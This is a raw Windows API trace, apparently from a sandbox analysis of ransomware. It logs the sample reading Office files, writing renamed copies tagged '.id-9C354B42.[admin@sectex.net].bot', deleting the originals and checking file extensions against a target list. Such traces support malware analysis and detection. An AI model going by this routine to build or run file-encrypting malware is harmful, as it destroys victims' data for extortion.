	[0153.628] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WDERRLNK.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\wderrlnk.vrd"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c
	[0153.632] SetFilePointerEx (in: hFile=0x25c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.632] SetFilePointerEx (in: hFile=0x25c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.632] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WDERRLNK.VRD.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\wderrlnk.vrd.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f8
	[0153.633] GetLastError () returned 0x0
	[0153.633] ReadFile (in: hFile=0x25c, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x722, lpOverlapped=0x0) returned 1
	[0153.635] WriteFile (in: hFile=0x3f8, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0x730, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0x730, lpOverlapped=0x0) returned 1
	[0153.636] ReadFile (in: hFile=0x25c, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x0, lpOverlapped=0x0) returned 1
	[0153.636] WriteFile (in: hFile=0x3f8, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0153.636] SetEndOfFile (hFile=0x3f8) returned 1
	[0153.636] CloseHandle (hObject=0x3f8) returned 1
	[0153.636] SetFilePointerEx (in: hFile=0x25c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.636] SetEndOfFile (hFile=0x25c) returned 1
	[0153.638] CloseHandle (hObject=0x25c) returned 1
	[0153.638] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WDERRLNK.VRD.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0153.639] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WDERRLNK.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\wderrlnk.vrd")) returned 1
	[0153.639] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WDERRLNK.VRD") returned 60
	[0153.639] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WDERRLNK.VRD") returned 60
	[0153.639] lstrlenW (lpString=".doc") returned 4
	[0153.639] lstrcmpiW (lpString1=".doc", lpString2=".VRD") returned -1
	[0153.639] lstrlenW (lpString=".docx") returned 5
	[0153.639] lstrcmpiW (lpString1=".docx", lpString2="K.VRD") returned -1
	[0153.639] lstrlenW (lpString=".pdf") returned 4
	[0153.639] lstrcmpiW (lpString1=".pdf", lpString2=".VRD") returned -1
	[0153.639] lstrlenW (lpString=".xls") returned 4
	[0153.639] lstrcmpiW (lpString1=".xls", lpString2=".VRD") returned 1
	[0153.639] lstrlenW (lpString=".xlsx") returned 5
	[0153.639] lstrcmpiW (lpString1=".xlsx", lpString2="K.VRD") returned -1
	[0153.639] lstrlenW (lpString=".ppt") returned 4
	[0153.639] lstrcmpiW (lpString1=".ppt", lpString2=".VRD") returned -1
	[0153.640] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WDERRLNK.VRD") returned 60
	[0153.640] lstrlenW (lpString=".zip") returned 4
	[0153.640] lstrcmpiW (lpString1=".zip", lpString2=".VRD") returned 1
	[0153.640] lstrlenW (lpString=".rar") returned 4
	[0153.640] lstrcmpiW (lpString1=".rar", lpString2=".VRD") returned -1
	[0153.640] lstrlenW (lpString=".bz2") returned 4
	[0153.640] lstrcmpiW (lpString1=".bz2", lpString2=".VRD") returned -1
	[0153.640] lstrlenW (lpString=".7z") returned 3
	[0153.640] lstrcmpiW (lpString1=".7z", lpString2="VRD") returned -1
	[0153.640] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WDERRLNK.VRD") returned 60
	[0153.640] lstrlenW (lpString=".dbf") returned 4
	[0153.640] lstrcmpiW (lpString1=".dbf", lpString2=".VRD") returned -1
	[0153.640] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WDERRLNK.VRD") returned 60
	[0153.640] lstrlenW (lpString=".1cd") returned 4
	[0153.640] lstrcmpiW (lpString1=".1cd", lpString2=".VRD") returned -1
	[0153.640] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WDERRLNK.VRD") returned 60
	[0153.640] lstrlenW (lpString=".jpg") returned 4
	[0153.640] lstrcmpiW (lpString1=".jpg", lpString2=".VRD") returned -1
	[0153.640] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WDERRLNK.VRD") returned 60
	[0153.640] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WDERRLNK.VRD") returned 60
	[0153.640] lstrlenW (lpString=".doc") returned 4
	[0153.640] lstrcmpiW (lpString1=".doc", lpString2=".VRD") returned -1
	[0153.640] lstrlenW (lpString=".docx") returned 5
	[0153.640] lstrcmpiW (lpString1=".docx", lpString2="K.VRD") returned -1
	[0153.640] lstrlenW (lpString=".pdf") returned 4
	[0153.640] lstrcmpiW (lpString1=".pdf", lpString2=".VRD") returned -1
	[0153.640] lstrlenW (lpString=".xls") returned 4
	[0153.640] lstrcmpiW (lpString1=".xls", lpString2=".VRD") returned 1
	[0153.640] lstrlenW (lpString=".xlsx") returned 5
	[0153.640] lstrcmpiW (lpString1=".xlsx", lpString2="K.VRD") returned -1
	[0153.640] lstrlenW (lpString=".ppt") returned 4
	[0153.640] lstrcmpiW (lpString1=".ppt", lpString2=".VRD") returned -1
	[0153.641] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WDERRLNK.VRD") returned 60
	[0153.641] lstrlenW (lpString=".zip") returned 4
	[0153.641] lstrcmpiW (lpString1=".zip", lpString2=".VRD") returned 1
	[0153.641] lstrlenW (lpString=".rar") returned 4
	[0153.641] lstrcmpiW (lpString1=".rar", lpString2=".VRD") returned -1
	[0153.641] lstrlenW (lpString=".bz2") returned 4
	[0153.641] lstrcmpiW (lpString1=".bz2", lpString2=".VRD") returned -1
	[0153.641] lstrlenW (lpString=".7z") returned 3
	[0153.641] lstrcmpiW (lpString1=".7z", lpString2="VRD") returned -1
	[0153.641] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WDERRLNK.VRD") returned 60
	[0153.641] lstrlenW (lpString=".dbf") returned 4
	[0153.641] lstrcmpiW (lpString1=".dbf", lpString2=".VRD") returned -1
	[0153.641] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WDERRLNK.VRD") returned 60
	[0153.641] lstrlenW (lpString=".1cd") returned 4
	[0153.641] lstrcmpiW (lpString1=".1cd", lpString2=".VRD") returned -1
	[0153.641] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WDERRLNK.VRD") returned 60
	[0153.641] lstrlenW (lpString=".jpg") returned 4
	[0153.641] lstrcmpiW (lpString1=".jpg", lpString2=".VRD") returned -1
	[0153.641] lstrcmpiW (lpString1=".HXS", lpString2=".bot") returned 1
	[0153.641] lstrlenW (lpString="WINPROJ.HXS") returned 11
	[0153.641] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winproj.hxs"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c
	[0153.642] GetFileSizeEx (in: hFile=0x25c, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=1475590) returned 1
	[0153.642] CloseHandle (hObject=0x25c) returned 1
	[0153.642] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winproj.hxs")) returned 0x20
	[0153.643] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ.HXS.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winproj.hxs.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0153.643] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winproj.hxs"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c
	[0153.643] SetFilePointerEx (in: hFile=0x25c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.643] SetFilePointerEx (in: hFile=0x25c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.643] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ.HXS.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winproj.hxs.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f8
	[0153.644] GetLastError () returned 0x0
	[0153.644] ReadFile (in: hFile=0x25c, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0xffff0, lpOverlapped=0x0) returned 1
	[0154.091] WriteFile (in: hFile=0x3f8, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xffff0, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xffff0, lpOverlapped=0x0) returned 1
	[0154.108] ReadFile (in: hFile=0x25c, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x68416, lpOverlapped=0x0) returned 1
	[0154.122] WriteFile (in: hFile=0x3f8, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0x68420, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0x68420, lpOverlapped=0x0) returned 1
	[0154.351] ReadFile (in: hFile=0x25c, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x0, lpOverlapped=0x0) returned 1
	[0154.351] WriteFile (in: hFile=0x3f8, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xea, lpOverlapped=0x0) returned 1
	[0154.383] SetEndOfFile (hFile=0x3f8) returned 1
	[0154.383] CloseHandle (hObject=0x3f8) returned 1
	[0154.383] SetFilePointerEx (in: hFile=0x25c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0154.383] SetEndOfFile (hFile=0x25c) returned 1
	[0155.469] CloseHandle (hObject=0x25c) returned 1
	[0155.469] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ.HXS.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0155.469] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winproj.hxs")) returned 1
	[0155.470] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ.HXS") returned 59
	[0155.470] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ.HXS") returned 59
	[0155.470] lstrlenW (lpString=".doc") returned 4
	[0155.470] lstrcmpiW (lpString1=".doc", lpString2=".HXS") returned -1
	[0155.470] lstrlenW (lpString=".docx") returned 5
	[0155.470] lstrcmpiW (lpString1=".docx", lpString2="J.HXS") returned -1
	[0155.470] lstrlenW (lpString=".pdf") returned 4
	[0155.470] lstrcmpiW (lpString1=".pdf", lpString2=".HXS") returned 1
	[0155.470] lstrlenW (lpString=".xls") returned 4
	[0155.470] lstrcmpiW (lpString1=".xls", lpString2=".HXS") returned 1
	[0155.470] lstrlenW (lpString=".xlsx") returned 5
	[0155.470] lstrcmpiW (lpString1=".xlsx", lpString2="J.HXS") returned -1
	[0155.470] lstrlenW (lpString=".ppt") returned 4
	[0155.470] lstrcmpiW (lpString1=".ppt", lpString2=".HXS") returned 1
	[0155.470] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ.HXS") returned 59
	[0155.470] lstrlenW (lpString=".zip") returned 4
	[0155.470] lstrcmpiW (lpString1=".zip", lpString2=".HXS") returned 1
	[0155.470] lstrlenW (lpString=".rar") returned 4
	[0155.471] lstrcmpiW (lpString1=".rar", lpString2=".HXS") returned 1
	[0155.471] lstrlenW (lpString=".bz2") returned 4
	[0155.471] lstrcmpiW (lpString1=".bz2", lpString2=".HXS") returned -1
	[0155.471] lstrlenW (lpString=".7z") returned 3
	[0155.471] lstrcmpiW (lpString1=".7z", lpString2="HXS") returned -1
	[0155.471] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ.HXS") returned 59
	[0155.471] lstrlenW (lpString=".dbf") returned 4
	[0155.471] lstrcmpiW (lpString1=".dbf", lpString2=".HXS") returned -1
	[0155.471] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ.HXS") returned 59
	[0155.471] lstrlenW (lpString=".1cd") returned 4
	[0155.471] lstrcmpiW (lpString1=".1cd", lpString2=".HXS") returned -1
	[0155.471] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ.HXS") returned 59
	[0155.471] lstrlenW (lpString=".jpg") returned 4
	[0155.471] lstrcmpiW (lpString1=".jpg", lpString2=".HXS") returned 1
	[0155.471] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ.HXS") returned 59
	[0155.471] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ.HXS") returned 59
	[0155.471] lstrlenW (lpString=".doc") returned 4
	[0155.471] lstrcmpiW (lpString1=".doc", lpString2=".HXS") returned -1
	[0155.471] lstrlenW (lpString=".docx") returned 5
	[0155.471] lstrcmpiW (lpString1=".docx", lpString2="J.HXS") returned -1
	[0155.471] lstrlenW (lpString=".pdf") returned 4
	[0155.471] lstrcmpiW (lpString1=".pdf", lpString2=".HXS") returned 1
	[0155.471] lstrlenW (lpString=".xls") returned 4
	[0155.471] lstrcmpiW (lpString1=".xls", lpString2=".HXS") returned 1
	[0155.471] lstrlenW (lpString=".xlsx") returned 5
	[0155.471] lstrcmpiW (lpString1=".xlsx", lpString2="J.HXS") returned -1
	[0155.471] lstrlenW (lpString=".ppt") returned 4
	[0155.471] lstrcmpiW (lpString1=".ppt", lpString2=".HXS") returned 1
	[0155.471] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ.HXS") returned 59
	[0155.471] lstrlenW (lpString=".zip") returned 4
	[0155.472] lstrcmpiW (lpString1=".zip", lpString2=".HXS") returned 1
	[0155.472] lstrlenW (lpString=".rar") returned 4
	[0155.472] lstrcmpiW (lpString1=".rar", lpString2=".HXS") returned 1
	[0155.472] lstrlenW (lpString=".bz2") returned 4
	[0155.472] lstrcmpiW (lpString1=".bz2", lpString2=".HXS") returned -1
	[0155.472] lstrlenW (lpString=".7z") returned 3
	[0155.472] lstrcmpiW (lpString1=".7z", lpString2="HXS") returned -1
	[0155.472] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ.HXS") returned 59
	[0155.472] lstrlenW (lpString=".dbf") returned 4
	[0155.472] lstrcmpiW (lpString1=".dbf", lpString2=".HXS") returned -1
	[0155.472] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ.HXS") returned 59
	[0155.472] lstrlenW (lpString=".1cd") returned 4
	[0155.472] lstrcmpiW (lpString1=".1cd", lpString2=".HXS") returned -1
	[0155.472] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ.HXS") returned 59
	[0155.472] lstrlenW (lpString=".jpg") returned 4
	[0155.472] lstrcmpiW (lpString1=".jpg", lpString2=".HXS") returned 1
	[0155.472] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0155.472] lstrlenW (lpString="ACCDDS.DLL") returned 10
	[0155.472] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ACCDDS.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\accdds.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0155.853] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=1250224) returned 1
	[0155.853] CloseHandle (hObject=0x3ac) returned 1
	[0155.853] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ACCDDS.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\accdds.dll")) returned 0x20
	[0155.887] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ACCDDS.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\accdds.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0155.887] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ACCDDS.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\accdds.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0155.888] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ACCDDS.DLL") returned 53
	[0155.888] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ACCDDS.DLL") returned 53
	[0155.888] lstrlenW (lpString=".doc") returned 4
	[0155.888] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0155.888] lstrlenW (lpString=".docx") returned 5
	[0155.888] lstrcmpiW (lpString1=".docx", lpString2="S.DLL") returned -1
	[0155.888] lstrlenW (lpString=".pdf") returned 4
	[0155.888] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0155.888] lstrlenW (lpString=".xls") returned 4
	[0155.888] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0155.888] lstrlenW (lpString=".xlsx") returned 5
	[0155.889] lstrcmpiW (lpString1=".xlsx", lpString2="S.DLL") returned -1
	[0155.889] lstrlenW (lpString=".ppt") returned 4
	[0155.889] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0155.889] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ACCDDS.DLL") returned 53
	[0155.889] lstrlenW (lpString=".zip") returned 4
	[0155.889] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0155.889] lstrlenW (lpString=".rar") returned 4
	[0155.889] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0155.889] lstrlenW (lpString=".bz2") returned 4
	[0155.889] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0155.889] lstrlenW (lpString=".7z") returned 3
	[0155.889] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0155.889] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ACCDDS.DLL") returned 53
	[0155.889] lstrlenW (lpString=".dbf") returned 4
	[0155.889] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0155.889] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ACCDDS.DLL") returned 53
	[0155.889] lstrlenW (lpString=".1cd") returned 4
	[0155.889] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0155.889] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ACCDDS.DLL") returned 53
	[0155.889] lstrlenW (lpString=".jpg") returned 4
	[0155.889] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0155.889] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ACCDDS.DLL") returned 53
	[0155.889] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ACCDDS.DLL") returned 53
	[0155.889] lstrlenW (lpString=".doc") returned 4
	[0155.889] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0155.889] lstrlenW (lpString=".docx") returned 5
	[0155.889] lstrcmpiW (lpString1=".docx", lpString2="S.DLL") returned -1
	[0155.889] lstrlenW (lpString=".pdf") returned 4
	[0155.889] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0155.889] lstrlenW (lpString=".xls") returned 4
	[0155.889] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0155.890] lstrlenW (lpString=".xlsx") returned 5
	[0155.890] lstrcmpiW (lpString1=".xlsx", lpString2="S.DLL") returned -1
	[0155.890] lstrlenW (lpString=".ppt") returned 4
	[0155.890] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0155.890] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ACCDDS.DLL") returned 53
	[0155.890] lstrlenW (lpString=".zip") returned 4
	[0155.890] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0155.890] lstrlenW (lpString=".rar") returned 4
	[0155.890] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0155.890] lstrlenW (lpString=".bz2") returned 4
	[0155.890] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0155.890] lstrlenW (lpString=".7z") returned 3
	[0155.890] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0155.890] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ACCDDS.DLL") returned 53
	[0155.890] lstrlenW (lpString=".dbf") returned 4
	[0155.890] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0155.890] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ACCDDS.DLL") returned 53
	[0155.890] lstrlenW (lpString=".1cd") returned 4
	[0155.890] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0155.890] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ACCDDS.DLL") returned 53
	[0155.890] lstrlenW (lpString=".jpg") returned 4
	[0155.890] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0155.890] lstrcmpiW (lpString1=".ECF", lpString2=".bot") returned 1
	[0155.890] lstrlenW (lpString="FAXEXT.ECF") returned 10
	[0155.890] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\FAXEXT.ECF" (normalized: "c:\\program files\\microsoft office\\office14\\addins\\faxext.ecf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0
	[0155.909] GetFileSizeEx (in: hFile=0x3b0, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=830) returned 1
	[0155.909] CloseHandle (hObject=0x3b0) returned 1
	[0155.909] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\FAXEXT.ECF" (normalized: "c:\\program files\\microsoft office\\office14\\addins\\faxext.ecf")) returned 0x20
	[0155.932] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\FAXEXT.ECF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\addins\\faxext.ecf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0155.932] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\FAXEXT.ECF" (normalized: "c:\\program files\\microsoft office\\office14\\addins\\faxext.ecf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x268
	[0155.932] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0155.932] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0155.932] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\FAXEXT.ECF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\addins\\faxext.ecf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4
	[0155.933] GetLastError () returned 0x0
	[0155.933] ReadFile (in: hFile=0x268, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x33e, lpOverlapped=0x0) returned 1
	[0155.959] WriteFile (in: hFile=0x3d4, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0x340, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0x340, lpOverlapped=0x0) returned 1
	[0155.960] ReadFile (in: hFile=0x268, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x0, lpOverlapped=0x0) returned 1
	[0155.960] WriteFile (in: hFile=0x3d4, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xe8, lpOverlapped=0x0) returned 1
	[0155.961] SetEndOfFile (hFile=0x3d4) returned 1
	[0155.961] CloseHandle (hObject=0x3d4) returned 1
	[0155.961] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0155.961] SetEndOfFile (hFile=0x268) returned 1
	[0155.963] CloseHandle (hObject=0x268) returned 1
	[0155.963] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\FAXEXT.ECF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0155.964] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\FAXEXT.ECF" (normalized: "c:\\program files\\microsoft office\\office14\\addins\\faxext.ecf")) returned 1
	[0155.964] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\FAXEXT.ECF") returned 60
